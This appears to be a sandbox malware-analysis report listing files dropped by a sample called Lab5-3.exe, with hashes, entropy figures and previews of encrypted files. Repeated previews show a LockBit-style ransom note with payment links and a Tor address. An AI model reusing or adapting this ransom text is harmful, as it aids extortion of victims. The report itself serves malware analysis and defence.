                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11104
                                                                                                          Entropy (8bit):7.981741058207676
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:4xr5xhLmyGBJAO4Y+E0Hi6NTsSUpLuKEg9ZCxMG6u+QYWA2t0Cb:4Wvb4EagpLuKEUCXJ3ttb
                                                                                                          MD5:DAF7A694B4A3E6A88609A14C01E54111
                                                                                                          SHA1:E99C7BE4D68C6661768E45D8D595CCAD4CBE99DC
                                                                                                          SHA-256:16455B62E63C675C20D7EF4FD35D117F0FE1EB6A47B4503D27DA26784CF91A27
                                                                                                          SHA-512:CA7A775BE670377DD73ADC891AD5B9FA057A694953633CB3463CA56073C8137A2ECCF4B86A4BFF04A45C1432A5EAA645D2C224ACD97C783C41BB7D37392E4155
                                                                                                          Malicious:false
                                                                                                          Preview:...D.+A3.Z..../[..Y.[.E.~m..d..z.V.+hX.G..)..J..R.h...wJs.SLp._P.6.qC./.Y..S......pa.s.A...3WF.QUG..K....uyz.d...........:..K&G.... #...0<.+c...6....^+...T.r.D..HX..........=.N].EY..H..4~C4...5..Z.U.L.T.a.,..>...L_....#V....Q...=...L.3..D.d..Kc)6gX*r....]6+..m.B3(.6UB..~@..$~od..........t...t...S....>#.8..sk8..+.j.jA....x..g.J^.G/,.{ (.5....StM :E.X..>f..t.dH.i.B..y.gm.........NUm\....?9....T.>.P-.I.M.=..%..$.......`.....XL..........:....YN<..y..5...;[F. ...........u..2A".ta.8.u..Y..%....V....w.Dy..q.-.:KER...7...0.T7l.!.;..z#!NDIb.'....X.._.+.c.{g.oU.V.....N!...._%...+\md.......7..El].1..s.....FC~.....[(=y....KA.r$...tBf..x<C.U....H.h...Y.y....L......".|..j...l...N..5y...."7_.H....:d..I..w.. ..>.{=b..=.M.W(..rt=./.........&.md...GW......h.r.gF.V.RN[:k....*..4...mIs...h"...-..>.XT..sB..J.X......&.W.f..%$.....,....1..%...>J...........x.R...1..\].Cm...&..."......~l?..-..c5n.<H$.?..%.u..C.A.7...(PIw...d].....".&R.J..E...h.%......&.U.......s
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9888
                                                                                                          Entropy (8bit):7.980674857009451
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:dmjaYOeC0E4vsh5Md167rGz1Vp9US1LkYTJo7HKTpxbv1cMk0Cb:cOYOp/AsDi10ujpbLkYKm31cJtb
                                                                                                          MD5:CBADF4D2641F9172CF077ECF5002FB97
                                                                                                          SHA1:3E6BE1A4CBE5FA5DD6FF15F5F005842300C7AAD5
                                                                                                          SHA-256:62E2D7725198229A99E6996AFE1671563BA2694C1788DE698C9A565D6A2DF144
                                                                                                          SHA-512:6AF899A6FABB01EC639C12FB154202C819A140D38761BFBCC4FF3443F5AC6362A716F30193581AE0D00F42B7F731A24752F5769ECF9E319A9FFDBF757F038F0E
                                                                                                          Malicious:false
                                                                                                          Preview:..i...J.....m....k}#.e.w.+L"....).9.......t...6.T..&......X....;z..s..@.X3.Y.w.R(.(.F{..y....!g....s.#.#.U...kt.v.$.F........g.6..\.y`....iIo.-_;.b...B..F..._W'.....Q.8.....1....B&...n.>...z.U.p@:4......[..pyz..ub..^.&...........P$.....J6.......}.$Zf'.........Y)......K..O0f.y..q.q...H ...N.?B.&.....1y.7_.;W.g..@Qe.&......w2l.c....C...h...,z.,.X.9..t&+....CR.."......D.@...9....4....~j.?.V.Wb@!..xg.t.<m....&z.=...v]<6.j..O....p)......Had.i7....x.QS..=.o.'.._.$.y......r?......$.....4...i.h....HCZk...v.%h.gq".O.H..6.'.D'.6.?b..@...?K.[.a..k.\a.S...|..L.-+d...0..m%..Z.k. .@.Z.i....xD9....j0..Xp;o..qo.....u......]-:R.._...D......nsA.C2..qrt#&.. Z..r.%u.7.dS...+*.3...I.j.AL..W...)...Yi..J...).......k".e..........+..!.X.F.......*........m.|xI.$.oq..;.xZ...|.$B;...l....h0.H.LG.Lo.`@.!5...=.vYx..c.....nX..q...x,JD...%B...OQ.|.V...M..QH...^..\M..NW)..Y...U1.l"e.]...\@.7.....|'.x../Z.H..G........tCf.FG...!..t.D.v..1..}...'...L.XD.[.tx2"&...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14112
                                                                                                          Entropy (8bit):7.98655403834724
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:LRCVDIi8LWmqYzcf8FmeDZLe8Ve0UykeGzOOwQSKIjA5/mJNo+S667eQ8h/STFF8:LRjM5fuP1ehVDUqmIrH7T8hQD/Nf6tb
                                                                                                          MD5:5BEFE7BD073671E8151CB813EFE4ECAD
                                                                                                          SHA1:347CDA5837C8F8397D8089C3120CB025772A454D
                                                                                                          SHA-256:11AD2E7E1E457DF9E25F385BC18F5C1DF0EF8A0541799CC63AC6DD6AECF0730E
                                                                                                          SHA-512:A051A669D82D862C903F66ACD30291EBC12634539766E34A51039C3E8B8B567A695AECE2DCDBEB17D5D56CF53854FE21D1050C1D695411D76C478597FFE6DB5A
                                                                                                          Malicious:false
                                                                                                          Preview:.O@?}......g.dLyV....KO........>[...i}>...&.....I..Ot#..R..n.f..%.m.].)..q.^.?.|,......m.E:.K........U.eQ.X.GL'.h....k....9...(..<QEc...2....`e...A.rM...H^.5...{7..N.1|z..+G.*...4....J.BX..U7..].....Bt..E..S..t....".&..$.Sb.l....|O%o...&.aDi?.......HKw.D`....7.t..@dj..A.M>.N......<..#K.~.............Lc9.\.1.........gj.i..Aw..cQ.v....+Y....$..`.....6S.s0.C...0.T..J...9.XO.s.......%..b..B.y.].A..._...6.b..g..`.......l.Y.....0U..)"....C.a..W{w..|#U.5n.X.h....I/..i?`R.,.<f.i.....".....Q.i..."..2..Lh....@Mq.X0|;.T.5K.13EdJz..,O/..B.2...2i-T+.4.X...b.I.,T...Ok...m.D..>.c...%2....:sq&"#.@Ao.x.V.X.....(.6d.K..0...T.'E.z.O...<i..\Z..._..6....../1. .[z...../.>..*|.....Y"bC.1E./1A7....V...}...|4i.....w..P.;........|d.W..z....)p6.E_.).C.6.."...>.T..J..'..;b..b~k....x.j..p.Y..v.By.>Qgq).x6....]....B..I..../.8.t._.QL2n.dW.N]b.....y..Zp...d~.cH..e{..?Kq.).f...a....[9......i.._~..c.r..dZ...?......9L%<n..!P.%.Sb....@.m.n.A.....q.7G].^ .alI......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11104
                                                                                                          Entropy (8bit):7.9829758257714545
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:47LHT65dTEk03TEOxXoi+LqSnL+e+itcCHgFj3G+IR59IKKUQCGCU3y/F0Cb:47LH25ekmwzcMY1PIR5JcCUUtb
                                                                                                          MD5:C818086495D0F93C2A00D595963702DB
                                                                                                          SHA1:379C5442C78DF286DE84683058DA927EC1C5218B
                                                                                                          SHA-256:65368B3B9433C1C253D00C57693B16FC17A5CE549000A1CC56B2FEC171004D99
                                                                                                          SHA-512:28A847FB7DEDA54F65BE0EF61F57AD8EB6A1A29702B27D18D00CAFA70AC9F011692347F89B5A229996497AAF5B1F2B4989E56197C82D8E4E787CAC4445445C5E
                                                                                                          Malicious:false
                                                                                                          Preview:...wo.....oF`..G.J<.%.2...?...p.N..5........&;jE8.+.,Z..XQ.....].@..l.}.\S....................&&.#.zo.c...0..f..I...h.OC.;j.i.H7..6.&d..e.....5...o"...Zk.o...D......,.@@.T...5..%.....a.9%......0@Mx..?a.Y...RO...^@E...U..ZIoxj...h.....0dS..-....OB'...#_......SZ........a4...@...7..a7...f.._...k..w.u.;U..&...J.Jx_.3ee......t.#.e.T.b.......t..%...A.!......D...V..?....>n=....n.i..NI.U....K(...>..S.......v.XHz....u..T...+_...P.;...._.....E.iF#N.j..@.<d....+*.,7j...9b3..v=.fr......w.w.(.Z..%#.,..Z-.rh.....E._.HT..G.Y.]v..r...F..&c..%_.../..f8&A6}..4.......8z...G.g......7.F.3.....M ..m..p...._.G..J..qK......l^...s.,a...n........7...%p.G..[Q:T0.DqLtX:J.a.\..q..x..U..TP..A....N..g/.4..=*.+c.../hk.+P.&.......v.s...C.w..3.6.Y....;yO.#..S.#..2.D.Vi.l...... [.{..L.).F...M....K.{3......N.M....~:#../j/..l@.J.6i.....k.qG..%8e.[T.R...........b"..Q./.,c.l.)..........-q.5..%.XY*........VcH...+.Zu[.:'"@*.:z}AT.V..?..5i...>ib.....F.,q.P..{U$C..H^....6...0>\.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10528
                                                                                                          Entropy (8bit):7.98352842411101
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:wGRrgz1eABjOiW4y86zYGnJBuU2XvheS+bC3b7wKGz0Cb:BcBjOiCmGnXt0OHKGztb
                                                                                                          MD5:310A11F099D50C06BB529F05C4AF61F6
                                                                                                          SHA1:401C2BDE3D9161714B54C22AB1EA7F84AD57443D
                                                                                                          SHA-256:104D88E7B59E432811281F3B1286CF815E5187500FEC14BFCC54B7CD4ACF5A7F
                                                                                                          SHA-512:ACCD34A63C1C71E2650E882FD3770A69D0A66682C8C0892E506496CDBA0370D272BDEF534532FB8D32C045D8120C02B75196BFC63651D8275A6763904DEFA45E
                                                                                                          Malicious:false
                                                                                                          Preview:.%\BA.m....n.6(.....Z...!K..=..]r.H}QX.4.x.jg...U....0..PkS..C..^I{*yh@..'.T.yz.....Y.|..d....@.....&...ec.d....3=.W..i..,W..&..>(....X2..8...e#....\..m..6-w...^`.)..Jan..k..Wt.....'...{.E...o...H~..`.r.w......T8'..,.I`..+........T..1].'.*IO.Px.y.~Y.zE..z..mu..1V....I..Z%......#J./).W.*a.p....8R.4`.B....Y.`NT...T.Vs..Eb.q.....L$.Q..C}lE..H..uLK..n.B..tl!..a~a...._.pig.R....h._...d.!.N.}....@..P.Q .>..^.S..).WB..oTnH.O.......:...::].fZ.R..!.(...*...J;...$...]@..^y......$2O.....D..0.l1.......k............}dJ.Q..B{>f[.?.GS.....`....i$.......aq..JP..r.B./.kd.$....&cJnv@....e.....m.`.-J....)....#..^G\U.2.]9..b.....}.T....m3..s/.G..."......}.mg...S87.%.F{....7..jC(.H..)f..5S.RJ....g../%.?..^..we.>.o...V..q.}&..2*\F.~!+.[...=.._.q..!..q....[.o..<.V....p......r.k}...O.D.[7.4...C.2.JH%.X.s.../.{..*....=..{.3.E.1<,..=F..9....:j.<..........F,.J@...|.....,....#.2/...4.4...f.....H..5>.. X.S-.l..../.Y..<...g......p..C..Ef..._C...b..F:.. ...H.t5?..?sM2.7..=..*-
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10320
                                                                                                          Entropy (8bit):7.978933080032385
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:nx7kcQhCoN1aiii5WA7gDk233j739uw/Ywaqux2z/KJcXukI2qzM0Cb:x7kpN13v7kk233j7tb/YwFkGvI2qzMtb
                                                                                                          MD5:AE02FC9632B9B03E97042ECDC5C9AAE3
                                                                                                          SHA1:CCF471A27D5CAD377E651D5E54A9C9E3797560BA
                                                                                                          SHA-256:06760C2E7627BA570A7B8351F05D638FBE3265110CE8299D2CFF4E80CF3B129B
                                                                                                          SHA-512:AEB6526CCFBF43853F3FDB64FA245D7EE1F632FB0BD0FDE796344639301350FAD8196DB5FAD09F3663726A807AC59AFCD8ADFB6CE56C5DB833C1CA93B5BCB80C
                                                                                                          Malicious:false
                                                                                                          Preview:...G.H43..k.1..1L~>..-......G]..i<..<......-...k=..u..[#..D.E...bu.n..NW..#.ww`.7......*...L.B_.J...LE1{.U...4..pM......9o.....p..{.(....iu...a..2.%s..%..c..I...\... F..q~....u.S...v0...u...:......@.:..c.....&V..L....6...H.><.....3........|......:....{..Xc!.....c.j3..N|:W/..m........rsNB'.$F...]..E.`...6c.....Cw...?..C....)..E.`..Yq.....W....1..[....=...K.k3...K..=@,.b].i.JX.....0...2.*.....i.=.xh...\.p....q.o.8.IL.7v...#..a.<.."......_YNj......b.........?.f..F..X..[.|.o....+..%.1.:....@...s......"".5..OG.r..."...{S..dKx.7....``.....40...r}bn`.#.........,...g...(....P..&..Y.qP......-!.%2....>DR..=.=.X..9M...*.b.F.@W..t..S.j.&..........Vh.d...A.. ..N......d.j. ...T...v0....._.q....]./fp..L..~.8...2..\r..{..yn..g8.(../[.L......1..E..0`.....z.9z.Q.}.%.c.,..J'0..}..r.Q.f8qsR..1..j...y.]>.]..u...|2gM6.X.g2.9.z....Tc;.f.m...L...[..o./.R.T.'S..J..V"}....Q....Z.6to.>^.U..e.v...d'Jb.bF....8.9Nj.J0.\..Z...."..-S....~...:}*.0'.....CG.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10800
                                                                                                          Entropy (8bit):7.981603724237121
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:swuQOWdPO3ZAcKjFwXhySMpRFjXTAqNDdKm+Ncwu6YqAL/tm4A4rZjeRQIhQ0p0a:P233pvvMpXEc0Zutm4A4e1q0ptb
                                                                                                          MD5:369DFA8AD2F4F5EF7A03680ECBF2645F
                                                                                                          SHA1:88BF837BA8ACF4C90D7B0C282300AFB42E1C72A8
                                                                                                          SHA-256:E883AF56BD3D4D429376F8FE26C30A8EE5C592E492759312CECA9DD1EFBD6F32
                                                                                                          SHA-512:0220807AF8CD4BCC463D01A1CF0CA16A53002D9FDEB2BF3DE45B4386BFC1EC17709CC1B4037A50E1F1C83069E4DB499ACB9DB8D03B8B2EE6A73E56E210E7A9EA
                                                                                                          Malicious:false
                                                                                                          Preview:L.s....l8Y.....Ncu.P.?..J..Sv/...?*vc.<..>...LU....q..?....sy.l(\.X_.Y....>..,.>w...../.....<...B.Sv.,.....8......k..f.\.E...`...z..&..!.......:g.Z8.A....D.....G.j.BX'..*".&(=.].=.......~..R..O...G.-..1.h..._........L..2..*.o....O.M.............Up.....u...Y.......E...B8.b.77...Q..M..I4.^ W.'.aG.....=..}Zbk...4....e..n.?.o.`z.......^.JpO7te.%.[\..."O.Gx5.Q..M.....-..t.Q..s$.q....."z.GLO%.#..";.6Hj...M.y.9>s..Y..q.I^V....U&.....,..Cr.B.5.....T......[...#.1x..x......m.....H....d...(b%..J.Z.>..}.T\7..P.F...$.8.qdh.-b?.5..D.ed.(....-..y.1.D|.T.[.F'9..pT......:..z....s....Bg.=x......W..K.p:6...q0..`L......K...2.x...m.E...1...9.0.#.M.....cPzX...&..9....h.....\....X.-..M.d...~C~.Q....1,....\4.....#.o...p.a.:...s./......0....Q...b.....AC....-.S=...W."....aU....[C.b..._..a.....M1....}..r..|)J..(..6...f-dN..D.}.V..p.J6.Zq.....<.*.Ke,..;...QZ.kVb.4Il.M...p...H.G..|.V..!..K..T...]_(..Q<...<...9wR..ecr.`......a~y'n...*XP.1......L...D.Z.......lg..".?.a.Y..[...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.92971557547471
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:UBKI2IUPBhoHdmDyi5qwnlaTdMBDMNHpwEHHfUTid3hBaUoSGFcmeykEdEElU92i:2D2IUPBho0Dt5zlaTdMBwpwEsGx0uKeR
                                                                                                          MD5:2788BEB47F8ABA40372A267C29E30ECA
                                                                                                          SHA1:549A2686A0419D6994B1CE604F52AA79A9C5B1DF
                                                                                                          SHA-256:139A45AB779CDCEE0221033BD45D865F2892AE7EFD17CDB70AC5A4C4AC96CBD1
                                                                                                          SHA-512:813986CF331117603528C48701C7E14D1C4A0C0F22BB87A51084C24AD1E70DDA364C957705AE8E13C0C0906C8ABD38B4B6C6387B8BE7E5F8BBE94DB5B4CEF528
                                                                                                          Malicious:false
                                                                                                          Preview:..s.D...Mp.......L..\...D...z>.x?.\....".....8...4.A..a...&~..-.V.........V.~...t_.'..w"%@.R..0...92.H..(....4...z.oCx<{...0..3{\<..l.6q..I[b..../Jl.xt..c.z.e.....'%=.x.5k..._5Ci..v.uL......L.NI.P......./iv..j.a...)..rKQ..0..F.Q.k].H..O`..L.Y..|......_......=..'0*%.".%..<.e._C9.S1..s.gY.P.;..td..m"T..Hc..W.^..(.....7q.*'[.}.`....ltkH.d.......{......F..o{....z..PcruG.!........U...Mj...}V...p...Wr.O.?7....0....@..J......X0...Tz.U.....I\^A.k.*.....:.q.`E...{..`.....H.,_.o.Q.....Ez.............m.p.........U!....d..I..T..]8.....gl7.G0....Y..c'Q/}|.,..s..*.|0..YY.p;.jH....J.Fb.q........-........ou.d.HkM.8*..A..Z.._..G.a.7..I.WR.u.!.&ApP&.2..+.....R.......L...Art.....h.C....Bj.......N0z........kZVj.....E9#+.r.u.....s..w.g...qw...~8.H@C.....g'...3....7-..*..X.&...L....:1....0.\.vvd....w.......VC......$.,...MZ.p..}.......'mw....I~.^..1.5.Z}0|z..?z"z..;.^....V..........j..%...<E..>V2........=...9...fVO......;t......7....`...)&.6..Q....+G.$"....q....J
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
